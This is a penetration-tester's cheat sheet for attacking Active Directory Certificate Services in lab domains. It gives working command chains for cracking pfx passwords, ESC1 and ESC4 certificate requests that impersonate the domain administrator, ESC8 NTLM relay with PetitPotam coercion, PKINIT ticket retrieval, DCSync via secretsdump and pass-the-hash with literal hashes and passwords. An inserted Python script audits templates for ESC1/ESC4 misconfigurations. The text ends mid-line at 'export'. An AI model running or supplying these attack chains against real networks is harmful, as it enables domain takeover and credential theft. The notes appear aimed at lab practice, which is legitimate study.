Do you have certificates?

  • Check that the certificate and the key belong together: the MD5 of the modulus must be identical for both
openssl x509 -noout -modulus -in baker.crt | openssl md5
openssl rsa -noout -modulus -in baker.key | openssl md5

  • You will need the password for that key file.

  • If you have a pfx file, try to crack the private key password (extract the hash with pfx2john, then run john against it)

python3 /opt/JohnTheRipper/run/pfx2john.py lewis | tee -a clark
/opt/JohnTheRipper/run/john --wordlist=/usr/share/seclists/rockyou.txt clark

Make a pfx from the crt and key file if you have the key password (-passout pass: leaves the pfx without a password)

openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt -passout pass:
certipy auth -pfx baker.pfx -dc-ip 10.10.11.65

If you have a pfx, try to remove the password from the private key so that it works with certipy

openssl pkcs12 -in scott.pfx -out temp.key -nocerts -nodes
openssl pkcs12 -in scott.pfx -out temp.crt -clcerts -nokeys

openssl pkcs12 -export -out scott.pfx -inkey temp.key -in temp.crt -passout pass:
certipy auth -pfx scott.pfx -dc-ip 10.10.11.65

Install the Certipy branch with ESC13 support

# Clone the Certipy repository
git clone https://github.com/ly4k/Certipy.git
cd Certipy

# Add contributor's remote repository
git remote add sploutchy https://github.com/sploutchy/Certipy.git

# Fetch and checkout the pull request branch
git fetch sploutchy
git checkout -b esc13_support sploutchy/main

# Install the modified Certipy locally
pip3 install .

# Confirm the installation
certipy --version

Enumerate ADCS and vulnerable templates

cme ldap ips.txt -u 'trainee' -p 'trainee' -M adcs
certipy find -vulnerable -username 'trainee' -p 'trainee'  -dc-ip 10.10.122.154
certipy find -vulnerable -username 'Rosie.Powell@cicada.vl' -p 'Cicada123'  -dc-ip 10.10.76.195 -k -target DC-JPQ225.cicada.vl

ESC1

certipy req  -u 'banking$'@retro.vl -ca 'retro-DC-CA' -template RetroClients -p 'hacker@123' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug
certipy req  -u 'Mail01$'@hybrid.vl -ca 'hybrid-DC01-CA' -template HybridComputers -hashes 0f916c5246fdbc7ba95dcef4126d57bd -upn 'administrator@hybrid.vl' -dns 'dc01.hybrid.vl' -key-size 4096 -debug
  • -ca is the CA name, shown with the vulnerable template in the certipy find output
  • -template is the vulnerable template itself
  • -u and -p are the domain user or domain computer that has enrollment rights on the template
  • -upn is the target user placed in the SAN of the request
  • -dns is the DNS SAN of the request; the examples above use the domain controller's hostname
  • -key-size is the minimum key size, which can be found in the template itself
certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.82.138

You get the administrator NT hash

cme smb 10.10.82.138 -u administrator -H 252fac7066d93dd009d4fd2cd0368389
wmiexec.py administrator@dc.retro.vl -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

Extra

certipy cert -pfx administrator.pfx -nocert -out admin.key 

certipy cert -pfx administrator.pfx -nokey -out admin.crt 

python passthecert.py -action modify_user -crt ~/certi/admin.crt -key ~/certi/admin.key -domain hybrid.vl -dc-ip 10.10.239.149 -target administrator -new-pass

ESC4

ESC4                              : 'SENDAI.VL\\ca-operators' has dangerous permissions
certipy find -vulnerable -u clifford.davey -p 'RFmoB2WplgE_3p' -dc-ip 10.10.103.222
certipy template -u clifford.davey -p 'RFmoB2WplgE_3p' -template SendaiComputer -save-old -dc-ip 10.10.103.222

This rewrites the template into a configuration vulnerable to ESC1, ESC2, ESC3 and ESC4. Check it again.

certipy find -vulnerable -u clifford.davey -p 'RFmoB2WplgE_3p' -dc-ip 10.10.103.222
certipy req -u clifford.davey@sendai.vl -password 'RFmoB2WplgE_3p' -ca 'sendai-DC-CA' -target dc.sendai.vl -template SendaiComputer -upn 'administrator@sendai.vl' -dns 'dc.sendai.vl'
certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.103.222

You will get the hash

wmiexec.py administrator@dc.sendai.vl -hashes aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
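The ESC1 conditions behind the request flags listed above (the enrollee supplies the subject, no manager approval or authorized signature, an authentication-capable EKU, enrollment rights for low-privileged principals) and the ESC4 "dangerous permissions" finding can both be audited from the template attributes themselves. The script below is an added example, not part of these notes or of Certipy: it runs over constructed in-memory template records whose field names mirror the msPKI-* LDAP attributes and the template ACL, and all template, group and ACE values in it are made up. Filling the records from a real LDAP query is left to the reader.

```python
"""Audit AD CS certificate templates for ESC1 and ESC4 conditions.

Added example. Template records are constructed dicts standing in for
pKICertificateTemplate objects; a real audit would populate them from LDAP.
"""

# msPKI-Certificate-Name-Flag bit: requester may supply subject and SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: CA manager approval required (requests pend)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make the issued certificate usable for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Groups that are expected to hold control over templates (constructed list);
# any other principal with write rights on a template is an ESC4 finding
PRIVILEGED_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrators"}
DANGEROUS_RIGHTS = {"WriteDacl", "WriteOwner", "WriteProperty", "GenericAll", "GenericWrite"}
# Broad groups whose enrollment right makes a template reachable by any account
LOW_PRIV_ENROLLERS = {"Domain Users", "Domain Computers", "Authenticated Users"}


def allows_auth(ekus):
    """An empty EKU list means 'any purpose', so it also counts as authentication."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def check_esc1(t):
    """True when a low-privileged enroller can request a cert for an arbitrary UPN."""
    return bool(
        t["enabled"]
        and t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
        and not (t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS)
        and t["ra_signature"] == 0
        and allows_auth(t["ekus"])
        and set(t["enroll"]) & LOW_PRIV_ENROLLERS
    )


def check_esc4(t):
    """Return the non-privileged principals whose ACE lets them rewrite the template."""
    return sorted(
        ace["principal"]
        for ace in t["acl"]
        if ace["principal"] not in PRIVILEGED_PRINCIPALS
        and set(ace["rights"]) & DANGEROUS_RIGHTS
    )


def audit(templates):
    """Map template name -> list of findings, for templates that have any."""
    findings = {}
    for t in templates:
        issues = []
        if check_esc1(t):
            issues.append("ESC1")
        writers = check_esc4(t)
        if writers:
            issues.append("ESC4:" + ",".join(writers))
        if issues:
            findings[t["name"]] = issues
    return findings


# Constructed sample records; names and ACLs are invented for this example
SAMPLE_TEMPLATES = [
    {   # subject built from AD, so the requester cannot pick a UPN: not ESC1
        "name": "User", "enabled": True, "name_flag": 0x0, "enrollment_flag": 0x0,
        "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"],
        "acl": [{"principal": "Domain Admins", "rights": ["GenericAll"]}],
    },
    {   # enrollee supplies subject, but EKU is Server Authentication only: not ESC1
        "name": "WebServer", "enabled": True, "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0x0, "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.1"],
        "enroll": ["Domain Computers"],
        "acl": [{"principal": "Enterprise Admins", "rights": ["GenericAll"]}],
    },
    {   # all ESC1 conditions met
        "name": "LabComputers", "enabled": True, "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0x0, "ra_signature": 0, "ekus": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["Domain Computers"],
        "acl": [{"principal": "Domain Admins", "rights": ["GenericAll"]}],
    },
    {   # manager approval blocks ESC1, but a non-admin group can rewrite the template: ESC4
        "name": "OpsTemplate", "enabled": True, "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS, "ra_signature": 0,
        "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"],
        "acl": [{"principal": "Domain Admins", "rights": ["GenericAll"]},
                {"principal": "ca-operators", "rights": ["WriteDacl", "WriteProperty"]}],
    },
]

if __name__ == "__main__":
    for name, issues in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(issues)}")
```

The ESC4 check is deliberately strict: a template that a non-admin group can rewrite is reported even when its current flags are safe, because (as the certipy template command above shows) the write right is all that is needed to turn it into an ESC1 template later.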

ESC8

  • ADCS running in the domain.
  • A working coerce method (here we use PetitPotam unauthenticated, but an authenticated PrinterBug or any other coerce method works the same)
    • There is a useful template for ESC8; by default in Active Directory its name is DomainController

Check web enrollment

  • Check whether web enrollment is up and running at: http://192.168.56.23/certsrv/certfnsh.asp
  • If the server asks for authentication, the endpoint is reachable and everything is fine :)

Adding relay

  • Start a listener that relays SMB authentication to HTTP with impacket's ntlmrelayx
ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce

  • Launch the coerce with PetitPotam unauthenticated (this no longer works on an up-to-date Active Directory, but authenticated coerce methods work the same)
petitpotam.py 192.168.56.1 meereen.essos.local

Getting TGT using pkinittools

Copy the certificate obtained from ntlmrelayx into a cert.b64 file

vim cert.b64

If PKINITtools fails with an oscrypto error, reinstall oscrypto from git

pip3 install -I git+https://github.com/wbond/oscrypto.git

PKINITtools is installed here under /opt/Tools/active-directory/PKINITtools

Get the TGT

python3 gettgtpkinit.py -pfx-base64 $(cat /home/jay/goad/cert.b64) 'essos.local'/'meereen$' 'meereen.ccache'

Export the TGT and run DCSync

export KRB5CCNAME=/workspace/esc8/meereen.ccache
secretsdump -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

On Windows: certificate enrollment using the root CA .cer file

Log on as a local computer administrator account.

  • You can add the Root CA certificate to the computer's Trusted Root Certification Authorities store via the MMC:

    1. Open the Run command and type MMC.
      1. Select File then Add/Remove Snap-in
      2. Select Certificates, and click the Add > button.
      3. Select Computer Account, and click the Next button.
      4. Click the Finish button.
      5. Click OK
    2. Expand Certificates (Local Computer).
    3. Expand Trusted Root Certification Authorities.
    4. Right click on Certificates, and select All Tasks, and then select Import
      1. Certificate Import Wizard comes up.
      2. Click the Next button.
      3. Click the Browse… button and navigate to the CER file.
      4. Click the Next button.
      5. Leave the defaults, and click the Next button.
      6. Click the Finish button.

Generating the certificates for signing when we have the devops user

export